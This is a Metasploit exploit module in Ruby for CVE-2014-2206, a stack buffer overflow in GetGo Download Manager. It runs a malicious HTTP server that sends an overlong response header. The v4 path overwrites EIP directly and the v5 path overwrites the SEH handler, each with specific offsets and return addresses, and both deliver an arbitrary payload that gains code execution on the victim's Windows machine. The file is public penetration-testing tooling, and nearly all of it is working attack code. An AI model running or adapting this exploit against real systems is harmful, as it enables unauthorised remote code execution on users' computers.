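##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability in
          GetGo Download Manager version 5.3.0.2712 earlier, caused by an
          overly long HTTP response header. By persuading the victim to download
          a file from a malicious server, a remote attacker could execute
          arbitrary code on the system or cause the application to crash.
          This module has been tested successfully on Windows XP SP3.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Julien Ahrens', # Vulnerability discovery
          'Gabor Seljan',  # Metasploit module for v4
          'bzyo',          # Metasploit module for v5
          'sinn3r'         # Helping Gabor and bzyo (see #4588 & #9642)
        ],
        'References' => [
          [ 'EDB', '32132' ],
          [ 'OSVDB', '103910' ],
          [ 'CVE', '2014-2206' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'URIPATH' => "/shakeitoff.mp3"
        },
        'Platform' => 'win',
        'Payload' => {
          # v5 has no bad chars; the list below is what the v4 path needs.
          # NOTE(review): no 'Space' is declared, so the framework will not
          # constrain payload size. The v5 path enforces its own fixed-size
          # layout at send time instead (see exploit_v5).
          'BadChars' => "\x00\x0a\x0d"
        },
        'Targets' => [
          [ 'Automatic', {} ],
          [
            '4.9.0.1982 on Windows XP SP3',
            {
              'Offset' => 4107,
              'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30]
            }
          ],
          [
            '5.3.0.2712 on Windows XP SP3',
            {
              'Offset' => 4095,
              # 0:016> u 0x72d11f39
              # msacm32!wodMessage+0xd0f:
              # 72d11f39 5f     pop edi
              # 72d11f3a 5e     pop esi
              # 72d11f3b c20400 ret 4
              'Ret' => 0x72d11f39,
              # 12253 is the same size the python PoC used; exploit_v5 pads
              # the response to exactly this length.
              'MaxSize' => 12253
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2014-03-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Direct-EIP overwrite for the 4.x branch (this part is from Gabor Seljan).
  #
  # Layout: [Offset bytes of junk][nop nop jmp +6][Ret][payload]. The overflow
  # string is handed to create_response as the status message, and the body is
  # explicitly cleared, so the oversized data travels in the response header
  # rather than the body.
  #
  # @param cli [Rex::Proto::Http::ServerClient] the connected victim client
  # @param current_target [Msf::Module::Target] target carrying 'Offset'/'Ret'
  def exploit_v4(cli, current_target)
    sploit = rand_text_alpha(current_target['Offset'])
    sploit << "\x90\x90\xEB\x06"
    sploit << [current_target.ret].pack('V')
    sploit << payload.encoded

    print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")

    resp = create_response(200, sploit)
    resp.body = ""
    cli.send_response(resp)
  end

  # SEH overwrite for the 5.x branch (this part is from Auxilus with some help
  # from @_sinn3r).
  #
  # Layout: [Offset-4 bytes of junk][SEH record][payload][filler up to MaxSize].
  # The total length is pinned to 'MaxSize' because that is the size the
  # original PoC used; a payload too large to fit would silently push the
  # response past that length, so it is rejected here rather than sent with an
  # untested layout.
  #
  # @param cli [Rex::Proto::Http::ServerClient] the connected victim client
  # @param current_target [Msf::Module::Target] target carrying
  #   'Offset'/'Ret'/'MaxSize'
  def exploit_v5(cli, current_target)
    seh_record = generate_seh_record(current_target.ret)

    # Minus 4 for the SEH record
    junk_len = current_target['Offset'] - 4
    available = current_target['MaxSize'] - junk_len - seh_record.length
    shellcode = payload.encoded

    if shellcode.length > available
      print_error("Payload is #{shellcode.length} bytes but only #{available} bytes fit " \
                  "within MaxSize (#{current_target['MaxSize']}); choose a smaller payload")
      send_not_found(cli)
      return
    end

    buffer = Rex::Text.rand_text_alpha(junk_len)
    buffer << seh_record
    buffer << shellcode
    buffer << Rex::Text.rand_text_alpha(current_target['MaxSize'] - buffer.length)

    print_status("Sending #{buffer.length} bytes to port #{cli.peerport}...")

    res = create_response(200, buffer)
    cli.send_response(res)
  end

  # Dispatches an incoming request to the v4 or v5 exploit path.
  #
  # An explicitly selected target wins; with 'Automatic' the version is
  # inferred from the User-Agent header, which is attacker-observable client
  # input and is only used to choose between the two known layouts. Anything
  # unrecognised gets a 404 so the server never fires a payload blindly.
  #
  # @param cli [Rex::Proto::Http::ServerClient] the connected victim client
  # @param request [Rex::Proto::Http::Request] the request being served
  def on_request_uri(cli, request)
    print_status("#{cli.peerhost} connected")

    current_target = target
    user_agent = request.headers['User-Agent'].to_s

    if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/)
      print_status('Attempting to exploit against v4')
      current_target = targets[1]
      exploit_v4(cli, current_target)
    elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/)
      print_status('Attempting to exploit against v5')
      current_target = targets[2]
      exploit_v5(cli, current_target)
    else
      print_error('Sending 404 for unknown user-agent')
      send_not_found(cli)
    end
  end
end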